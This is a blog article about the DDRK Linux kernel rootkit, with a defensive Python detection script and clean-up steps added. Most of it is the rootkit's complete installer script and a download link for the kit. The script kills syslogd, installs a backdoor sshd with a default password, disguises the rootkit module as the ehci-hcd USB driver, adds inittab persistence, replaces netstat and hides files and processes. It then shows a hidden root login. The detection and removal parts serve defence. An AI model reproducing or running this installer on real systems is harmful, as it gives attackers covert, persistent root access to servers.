DDRK is a Linux kernel-level rootkit that combines the features of the shv rootkit and adore-ng.
DDRK files:
netstat      # replaces the system netstat; reads the backdoor port from the sshd configuration file and hides it
rk.ko        # kernel module that hides files and processes
setup        # rootkit installation script
tty          # ava control tool (adore-ng's userland utility)
bin.tgz
  --- ttymon
  --- sshd.tgz
      --- .sh
          --- shdcf2      # sshd configuration file
          --- shhk
          --- shhk.pub
          --- shrs
          --- sshd        # sshd main program
DDRK: http://www.sectop.com/soft/ddrk.tgz
Once these files are uploaded to a server and setup is run successfully (it must already be run as root), the attacker keeps root access to the server and can do whatever they want.
The setup content is as follows:
#!/bin/bash
########## Define variables ##########
DEFPASS=123456      # default password
DEFPORT=43958       # default port
BASEDIR=`pwd`
SSHDIR=/lib/libsh.so
HOMEDIR=/usr/lib/libsh
unset HISTFILE; unset HISTSIZE; unset HISTORY; unset HISTSAVE; unset HISTFILESIZE
export PATH=$PATH:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin
########## Check is root ##########
if [ "$(whoami)" != "root" ]; then
    echo "become root and try again"
    echo ""
    exit
fi
########## Extract all tar ##########
tar zxf bin.tgz
cd bin
tar zxf sshd.tgz
rm -rf ./sshd.tgz
cd $BASEDIR
rm -rf bin.tgz
cd $BASEDIR
########## Kill syslogd ##########
killall -9 syslogd >/dev/null 2>&1
sleep 2
########## Remove sh.conf ##########
if [ -f /etc/sh.conf ]; then
    rm -rf /etc/sh.conf      # password file (md5sum of the password)
fi
########## Initialize sshd configuration ##########
if test -n "$1"; then
    echo "Using Password: $1"
    cd $BASEDIR/bin
    echo -n $1 | md5sum >/etc/sh.conf
else
    echo "No Password Specified, using default - $DEFPASS"
    echo -n $DEFPASS | md5sum >/etc/sh.conf
fi
touch -acmr /bin/ls /etc/sh.conf
chown -f root:root /etc/sh.conf
if test -n "$2"; then
    echo "Using ssh-port: $2"
    echo "Port $2" >>$BASEDIR/bin/.sh/sshd_config
    cat $BASEDIR/bin/.sh/shdcf2 >$BASEDIR/bin/.sh/sshd_config; rm -rf $BASEDIR/bin/.sh/shdcf2
    mv $BASEDIR/bin/.sh/sshd_config $BASEDIR/bin/.sh/shdcf
else
    echo "No ssh-port Specified, using default - $DEFPORT"
    echo "Port $DEFPORT" >$BASEDIR/bin/.sh/sshd_config
    cat $BASEDIR/bin/.sh/shdcf2 >$BASEDIR/bin/.sh/sshd_config; rm -rf $BASEDIR/bin/.sh/shdcf2
    mv $BASEDIR/bin/.sh/sshd_config $BASEDIR/bin/.sh/shdcf
fi
########## Creating dirs ##########
SSHDIR=/lib/libsh.so
HOMEDIR=/usr/lib/libsh
if [ -d /lib/libsh.so ]; then
    rm -rf /lib/libsh.so
fi
if [ -d /usr/lib/libsh ]; then
    rm -rf /usr/lib/libsh/*
fi
mkdir $SSHDIR
touch -acmr /bin/ls $SSHDIR
mkdir $HOMEDIR
touch -acmr /bin/ls $HOMEDIR
cd $BASEDIR/bin
mv .sh/* $SSHDIR/
mv .sh/.bashrc $HOMEDIR
if [ -f /sbin/ttyload ]; then
    chattr -AacdisSu /sbin/ttyload
    rm -rf /sbin/ttyload
fi
if [ -f /usr/sbin/ttyload ]; then
    rm -rf /usr/sbin/ttyload
fi
if [ -f /sbin/ttymon ]; then
    rm -rf /sbin/ttymon
fi
mv $SSHDIR/sshd /sbin/ttyload
chmod a+xr /sbin/ttyload
chmod o-w /sbin/ttyload
touch -acmr /bin/ls /sbin/ttyload
kill -9 `pidof ttyload` >/dev/null 2>&1
mv $BASEDIR/bin/ttymon /sbin/ttymon
chmod a+xr /sbin/ttymon
touch -acmr /bin/ls /sbin/ttymon
kill -9 `pidof ttymon` >/dev/null 2>&1
cp /bin/bash $SSHDIR
########## Modify inittab ##########
cp /etc/inittab /etc/.inittab
# (the sed expression is garbled in the source listing; judging by the inittab shown later,
#  it inserts the "0:2345:once:/usr/sbin/ttyload" entry ahead of the first getty line)
sed -e 's@^:2345@0:2345:once:/usr/sbin/ttyload &@' /etc/inittab >/etc/.inittab
touch -acmr /etc/inittab /etc/.inittab
mv -f /etc/.inittab /etc/inittab
echo "/sbin/ttyload -q >/dev/null 2>&1" >/usr/sbin/ttyload
echo "/sbin/ttymon >/dev/null 2>&1" >/usr/sbin/ttyload
echo "${HOMEDIR}/tty i `pidof ttyload` >/dev/null 2>&1" >/usr/sbin/ttyload
echo "${HOMEDIR}/tty i `pidof ttymon` >/dev/null 2>&1" >/usr/sbin/ttyload
touch -acmr /bin/ls /usr/sbin/ttyload
chmod 755 /usr/sbin/ttyload
/usr/sbin/ttyload >/dev/null 2>&1
touch -amcr /bin/ls /etc/inittab
########## Make sure inittab has modified ##########
if [ ! "`grep ttyload /etc/inittab`" ]; then
    echo "# WARNING - sshd wont be reloaded upon restart"
    echo "# inittab shuffling probly fucked-up!"
fi
########## Load rk.ko ##########
cd $BASEDIR
modprobe -r ehci-hcd
mv -f rk.ko /lib/modules/`uname -r`/kernel/drivers/usb/host/ehci-hcd.ko
modprobe ehci-hcd
mv tty $HOMEDIR
########## Replace netstat ##########
touch -acmr /bin/netstat
mv -f netstat /bin/netstat
########## Hide all files and process ##########
$HOMEDIR/tty h /etc/sh.conf >/dev/null 2>&1
$HOMEDIR/tty h /lib/libsh.so >/dev/null 2>&1
$HOMEDIR/tty h /usr/lib/libsh >/dev/null 2>&1
$HOMEDIR/tty h /sbin/ttyload >/dev/null 2>&1
$HOMEDIR/tty h /usr/sbin/ttyload >/dev/null 2>&1
$HOMEDIR/tty h /sbin/ttymon >/dev/null 2>&1
$HOMEDIR/tty i `pidof ttyload` >/dev/null 2>&1
$HOMEDIR/tty i `pidof ttymon` >/dev/null 2>&1
########## Load rk.ko on boot ##########
cat >/etc/sysconfig/modules/ehci.modules <<EOF
#!/bin/sh
# Install usb modules support
modprobe -r ehci-hcd
modprobe ehci-hcd
EOF
touch -amcr /bin/ls /etc/sysconfig/modules/ehci.modules
chmod 755 /etc/sysconfig/modules/ehci.modules
$HOMEDIR/tty h /etc/sysconfig/modules/ehci.modules >/dev/null 2>&1
########## Check iptables setting ##########
if [ -f /sbin/iptables ]; then
    echo "`/sbin/iptables -L INPUT | head -5`"
else
    echo ""
    echo "# lucky for u no iptables found"
fi
########## Start syslogd ##########
/sbin/syslogd -m 0
# ./setup 123 3333        # set the password to 123 and the ssh port to 3333
Using Password: 123
Using ssh-port: 3333
Chain INPUT (policy ACCEPT)
target     prot opt source               destination
View the hiding effects:
View processes (only the egrep itself appears; ttyload and ttymon are hidden):
# ps -ef | egrep -i "ttyload|ttymon"
root 24761 17990 0 00:00:00 pts/2 egrep -i ttyload|ttymon
View ports (the backdoor sshd on 43958 is still listed here, but its owning process is hidden, so the PID column shows "-"):
# netstat -ntplu
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 127.0.0.1:2208          0.0.0.0:*               LISTEN      2117/hpiod
tcp        0      0 0.0.0.0:3306            0.0.0.0:*               LISTEN      2267/mysqld
tcp        0      0 0.0.0.0:43958           0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:631           0.0.0.0:*               LISTEN      2134/cupsd
tcp        0      0 127.0.0.1:25            0.0.0.0:*               LISTEN      2295/sendmail: acce
tcp        0      0 127.0.0.1:2207          0.0.0.0:*               LISTEN      2122/python
udp        0      0 0.0.0.0:32768           0.0.0.0:*                           2417/avahi-daemon:
udp        0      0 0.0.0.0:68              0.0.0.0:*                           19752/dhclient
udp        0      0 0.0.0.0:5353            0.0.0.0:*                           2417/avahi-daemon:
udp        0      0 0.0.0.0:631             0.0.0.0:*                           2134/cupsd
View the loaded module:
# lsmod | grep -i ehci-hcd
Note that lsmod prints module names with underscores (ehci_hcd), so grep for that form; and because rk.ko was installed under the real driver's file name, lsmod alone cannot distinguish the rootkit module from the genuine ehci_hcd.
View the rootkit's files:
# ls -dl /lib/libsh.so /usr/lib/libsh /etc/sh.conf /sbin/ttyload /sbin/ttymon /bin/ttymon /usr/sbin/ttyload
ls: /bin/ttymon: No such file or directory
-rw-r--     1 2618748389 4063569279     36 Nov 28  2006 /etc/sh.conf
drwxr-xr-x  2 2618748389 4063569279   4096 May 11       /lib/libsh.so
-rwxr-xr-x  1 2618748389 4063569279 212747 Nov 28  2006 /sbin/ttyload
-rwxrwxr-x  1 2618748389 4063569279  93476 Nov 28  2006 /sbin/ttymon
drwxr-xr-x  2 2618748389 4063569279   4096 May 11       /usr/lib/libsh
-rwxr-xr-x  1 2618748389 4063569279    171 Nov 28  2006 /usr/sbin/ttyload
View the /etc/inittab file:
# Run gettys in standard runlevels
0:2345:once:/usr/sbin/ttyload
1:2345:respawn:/sbin/mingetty tty1
2:2345:respawn:/sbin/mingetty tty2
3:2345:respawn:/sbin/mingetty tty3
4:2345:respawn:/sbin/mingetty tty4
5:2345:respawn:/sbin/mingetty tty5
6:2345:respawn:/sbin/mingetty tty6
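As an added example (not part of the original article), the following Python triage script turns the observations above into checks: it diffs the kernel's own listener table in /proc/net/tcp against netstat output to catch a port that a trojaned netstat drops, flags LISTEN sockets whose owner is reported as "-", and picks out inittab entries that launch anything outside the stock set of commands. The /proc/net/tcp, netstat and inittab samples are constructed, and KNOWN_INITTAB is an assumption about a RHEL 5-era inittab.

```python
import re

# Constructed /proc/net/tcp sample; local ports are hex (0CEA=3306, 0277=631, ABB6=43958).
PROC_TCP = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 00000000:0CEA 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 7001
   1: 0100007F:0277 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 7002
   2: 00000000:ABB6 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 7003
"""
# Constructed output of a trojaned netstat: 43958 is dropped, and the owner of the 631 socket is hidden.
NETSTAT = """\
Proto Recv-Q Send-Q Local Address   Foreign Address  State   PID/Program name
tcp        0      0 0.0.0.0:3306    0.0.0.0:*        LISTEN  2267/mysqld
tcp        0      0 127.0.0.1:631   0.0.0.0:*        LISTEN  -
"""
# Constructed inittab fragment in the layout the article shows.
INITTAB = """\
si::sysinit:/etc/rc.d/rc.sysinit
0:2345:once:/usr/sbin/ttyload
1:2345:respawn:/sbin/mingetty tty1
"""
KNOWN_INITTAB = ("/etc/rc.d/", "/etc/X11/", "/sbin/mingetty", "/sbin/shutdown")  # assumed stock set

def proc_listeners(text):
    """LISTEN (state 0A) local ports from /proc/net/tcp, which a userland netstat cannot filter."""
    ports = set()
    for line in text.splitlines()[1:]:
        f = line.split()
        if len(f) > 3 and f[3] == "0A":
            ports.add(int(f[1].rsplit(":", 1)[1], 16))
    return ports

def netstat_listeners(text):
    """Map of LISTEN port -> PID/Program column from `netstat -ntpl` output."""
    rx = re.compile(r"^tcp\S*\s+\d+\s+\d+\s+\S+:(\d+)\s+\S+\s+LISTEN\s+(\S+)")
    return {int(m.group(1)): m.group(2) for m in map(rx.match, text.splitlines()) if m}
def hidden_listeners(proc_tcp, netstat_out):
    """Ports the kernel reports as listening that netstat does not print."""
    return proc_listeners(proc_tcp) - set(netstat_listeners(netstat_out))
def orphan_listeners(netstat_out):
    """Listening ports whose owning process is invisible even to a root netstat run."""
    return {p for p, prog in netstat_listeners(netstat_out).items() if prog == "-"}
def odd_inittab(text):
    """(id, action, command) entries whose command is outside KNOWN_INITTAB."""
    hits = []
    for line in text.splitlines():
        m = re.match(r"^([^:#]+):([^:]*):([^:]+):(.+)$", line)
        if m and not m.group(4).startswith(KNOWN_INITTAB):
            hits.append((m.group(1), m.group(3), m.group(4)))
    return hits
```

On a live host, feed the functions open("/proc/net/tcp").read() and the output of netstat -ntpl; since a kernel module can filter /proc/net/tcp as well, also compare against a port scan run from another machine.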
Verification:
The compromised host on which setup was run is 192.168.27.129. Log in to it from another machine using password 123 and port 3333:
[root@localhost ~]# ssh 192.168.27.129 -p 3333
root@192.168.27.129's password:
Last login: Thu Nov 11 11:20:59 2010 from 192.168.27.1
[sh] w.e.l.c.o.m.e
[sh] To The DoDos Rootkit
[root@DoDo:/root]#
[root@DoDo:/root]# env
TERM=xterm
SHELL=/bin/bash
SSH_CLIENT=192.168.27.130 38824 3333
SSH_TTY=/dev/pts/3
USER=root
MAIL=/var/spool/mail/root
PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/bin/:/usr/local/sbin:/usr/lib/libs:.
PWD=/root
MACHINE=DoDo
PS1=[\033[0;36m][$ID@[\033[1;37m]$MACHINE[\033[0m][\033[0;36m]:${PWD}]#[\033[0m]
SHLVL=1
HOME=/usr/lib/libsh
ID=root
LOGNAME=root
_=/bin/env
At this point 192.168.27.129 is fully under the attacker's control.
On 192.168.27.129 itself, check who is logged in:
# w
13:40:55 up, 0 users, load average: 1.23, 0.93, 0.77
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
The backdoor session is not listed; only local users are shown.
Clean-up method:
# cd /usr/lib/libsh
# modprobe -r ehci-hcd
# ./tty u /etc/sysconfig/modules/ehci.modules
Checking for adore 0.12 or higher...
Failed to authorize myself. No luck, no adore?
Adore NOT installed. Exiting.
# rm -rf /etc/sysconfig/modules/ehci.modules
# rm -rf /lib/modules/`uname -r`/kernel/drivers/usb/host/ehci-hcd.ko
# ./tty u /etc/sh.conf
Checking for adore 0.12 or higher...
Failed to authorize myself. No luck, no adore?
Adore NOT installed. Exiting.
# ./tty u /lib/libsh.so
Checking for adore 0.12 or higher...
Failed to authorize myself. No luck, no adore?
Adore NOT installed. Exiting.
# ./tty u /sbin/ttyload
Checking for adore 0.12 or higher...
Failed to authorize myself. No luck, no adore?
Adore NOT installed. Exiting.
# ./tty u /usr/sbin/ttyload
Checking for adore 0.12 or higher...
Failed to authorize myself. No luck, no adore?
Adore NOT installed. Exiting.
# ./tty u /sbin/ttymon
Checking for adore 0.12 or higher...
Failed to authorize myself. No luck, no adore?
Adore NOT installed. Exiting.
# rm -rf /etc/sh.conf /lib/libsh.so /usr/lib/libsh /sbin/ttyload /usr/sbin/ttyload /sbin/ttymon
# rm -rf /bin/netstat
# vim /etc/inittab      remove the line 0:2345:once:/usr/sbin/ttyload
Once the module has been unloaded, tty can no longer talk to it (hence "Adore NOT installed"), but the hidden files and processes are visible again, so they can simply be removed; the running ttyload (the backdoor sshd) and ttymon processes should be killed too, and init told to re-read inittab (telinit q). Because setup overwrote the genuine ehci-hcd.ko with rk.ko and replaced /bin/netstat, both should be restored from the distribution's kernel and net-tools packages rather than left missing.
You should also find out how the attacker obtained root in the first place and close that hole, otherwise the rootkit will simply come back.
This article is from the blog "Yan que an Zhihong zhizai ".